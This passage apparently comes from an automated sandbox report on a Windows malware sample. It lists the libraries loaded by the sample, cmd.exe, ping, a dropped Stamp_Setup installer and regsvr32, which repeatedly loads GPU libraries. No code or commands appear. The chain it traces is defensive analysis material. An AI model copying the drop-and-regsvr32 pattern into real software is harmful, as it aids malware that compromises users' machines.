          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: cryptnet.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: explorerframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: sfc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxx.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: nvapi64.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
          Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dllJump to behavior
